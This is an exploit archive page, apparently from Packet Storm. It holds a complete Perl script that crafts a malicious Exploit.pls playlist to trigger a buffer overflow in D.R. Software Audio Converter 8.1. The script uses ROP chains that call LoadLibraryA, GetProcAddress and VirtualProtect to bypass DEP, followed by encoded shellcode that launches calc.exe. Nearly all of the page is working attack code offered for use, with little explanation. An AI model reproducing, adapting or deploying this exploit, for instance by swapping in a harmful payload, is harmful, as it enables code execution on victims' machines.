exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

D.R. Software Audio Converter 8.1 Buffer Overflow

D.R. Software Audio Converter 8.1 Buffer Overflow
Posted Aug 15, 2011
Authored by C4SS!0 G0M3S

D.R. Software Audio Converter version 8.1 buffer overflow exploit with DEP bypass.

tags | exploit, overflow
SHA-256 | aab8c6095791d1ed7f981ce09ffcc17fd83ada7855c6603c7419aa618e817339

D.R. Software Audio Converter 8.1 Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
#
#[+]Exploit Title: D.R. Software Audio Converter 8.1 DEP Bypass Exploit
#[+]Date: 13\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
#[+]Found By: Sud0 from Corelan Team(http://www.exploit-db.com/exploits/13760/) or also created KedAns-Dz(http://1337day.com/exploits/16248)
#[+]Version: 8.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#


print q{

Created By C4SS!0 G0M3S
E-mail louredo_@hotmail.com
Site net-fuzzer.blogspot.com
};
print "\n\t\t[+]Creating Exploit File...\n";
sleep(2);
#####################################ROP FOR LoadLibraryA##############################
my $rop = pack('V',0x00430076); # POP ECX # RETN
$rop .= pack('V',0x0044B274); # Endereco de LoadLibraryA
$rop .= pack('V',0x1003d56e); # POP ESI # RETN
$rop .= pack('V',0x10055FBD); # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to LoadLibraryA
$rop .= pack('V',0x10068022); # POP EBP # RETN
$rop .= pack('V',0x1003AA1A); # ADD ESP,28 # RETN 04
$rop .= pack('V',0x0040aaf2); # POP EDI # RETN
$rop .= pack('V',0x1002ef15); #RETN
$rop .= pack('V',0x1002ef14); # PUSHAD # RETN
$rop .= "kernel32.dll\x00";
$rop .= "A" x 11;
#####################################ROP END HERE#######################################

#####################################ROP FOR GetProcAddress#############################
$rop .= pack('V',0x1002ef15) x 3; #RETN
$rop .= pack('V',0x00430076); # POP ECX # RETN
$rop .= pack('V',0x0044B1E8); # Endereco de GetProcAddress
$rop .= pack('V',0x0040aaf2); # POP EDI # RETN
$rop .= pack('V',0x10055FBD); # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to GetProcAddress
$rop .= pack('V',0x1006809f); # POP ESI # RETN
$rop .= pack('V',0x1003AA1A); # ADD ESP,28 # RETN 04
$rop .= pack('V',0x00447b7d); # XCHG EAX,EBP # RETN
$rop .= pack('V',0x1002ef14); # PUSHAD # RETN
$rop .= "VirtualProtect\x00";
$rop .= "D" x 9; # Junk
#####################################ROP END HERE#######################################

################################ROP FOR VirtualProtect##################################
$rop .= pack('V',0x1002ef15) x 4; #RETN
$rop .= pack('V',0x10037d05); # XCHG EAX,ESI # RETN
$rop .= pack('V',0x100753c0); # PUSH ESP # POP EBP # POP EBX # ADD ESP,10 # RETN
$rop .= "A" x 20; # Junk
$rop .= pack('V',0x10015a15); # XCHG EAX,EBP # RETN
$rop .= pack('V',0x1004108e) x 20; # ADD EAX,0A # RETN
$rop .= pack('V',0x1007275D); # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
$rop .= "A" x 4;
$rop .= pack('V',0x1002ef15) x 5; #RETN
$rop .= pack('V',0x10037d05); # XCHG EAX,ESI # RETN
$rop .= pack('V',0x10068022); # POP EBP # RETN
$rop .= pack('V',0x0040A8F4); # CALL ESP // Endereço de retorno da funçao
$rop .= pack('V',0x100080ea); # POP EBX # RETN
$rop .= pack('V',0x00001000); # Valor de dwSize
$rop .= pack('V',0x10082cde); # POP EDX # RETN
$rop .= pack('V',0x00000040); # Valor de flNewProtect
$rop .= pack('V',0x1007076e); # POP EDI # RETN
$rop .= pack('V',0x1002ef15); # RETN
$rop .= pack('V',0x1002ef14); # PUSHAD # RETN
$rop .= "\x90" x 25; # Some nops
$rop .= "\xeb\x10"; # Little jmp to fix shellcode. :)
$rop .= "\x90" x 20; # More nops
####################################ROP END HERE#####################################

my $shellcode =
"\xb8\x4b\xaf\x2d\x0e\xda\xde\xd9\x74\x24\xf4\x5b\x29\xc9" .
"\xb1\x32\x83\xeb\xfc\x31\x43\x0e\x03\x08\xa1\xcf\xfb\x72" .
"\x55\x86\x04\x8a\xa6\xf9\x8d\x6f\x97\x2b\xe9\xe4\x8a\xfb" .
"\x79\xa8\x26\x77\x2f\x58\xbc\xf5\xf8\x6f\x75\xb3\xde\x5e" .
"\x86\x75\xdf\x0c\x44\x17\xa3\x4e\x99\xf7\x9a\x81\xec\xf6" .
"\xdb\xff\x1f\xaa\xb4\x74\x8d\x5b\xb0\xc8\x0e\x5d\x16\x47" .
"\x2e\x25\x13\x97\xdb\x9f\x1a\xc7\x74\xab\x55\xff\xff\xf3" .
"\x45\xfe\x2c\xe0\xba\x49\x58\xd3\x49\x48\x88\x2d\xb1\x7b" . # Shellcode Winexec "Calc.exe"
"\xf4\xe2\x8c\xb4\xf9\xfb\xc9\x72\xe2\x89\x21\x81\x9f\x89" . # Bad chars "\x00\x20\x3d\x0a\x0d\xff"
"\xf1\xf8\x7b\x1f\xe4\x5a\x0f\x87\xcc\x5b\xdc\x5e\x86\x57" .
"\xa9\x15\xc0\x7b\x2c\xf9\x7a\x87\xa5\xfc\xac\x0e\xfd\xda" .
"\x68\x4b\xa5\x43\x28\x31\x08\x7b\x2a\x9d\xf5\xd9\x20\x0f" .
"\xe1\x58\x6b\x45\xf4\xe9\x11\x20\xf6\xf1\x19\x02\x9f\xc0" .
"\x92\xcd\xd8\xdc\x70\xaa\x17\x97\xd9\x9a\xbf\x7e\x88\x9f" .
"\xdd\x80\x66\xe3\xdb\x02\x83\x9b\x1f\x1a\xe6\x9e\x64\x9c" .
"\x1a\xd2\xf5\x49\x1d\x41\xf5\x5b\x7e\x04\x65\x07\x81";

my $buf = "A" x 180;
$buf .= pack('V',0x1001bc95); # ADD ESP,1010 # RETN 04
$buf .= "A" x 4112;
$buf .= pack('V',0x10071916) x 2; # RETN
$buf .= pack('V',0x10071910); # ADD ESP,100 # RETN
$buf .= "C" x (4436-length($buf));
$buf .= pack('V',0x10029cfd); # ADD ESP,814 # RETN
$buf .= "A" x 124;
$buf .= $rop;
$buf .= $shellcode;
$buf .= "D" x (30000-length($buf));

open(f,">Exploit.pls") or die "[*]Error: $!\n";
print f $buf;
close f;
print "\t\t[+]File Exploit.pls Created successfully.\n";
sleep(1);

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close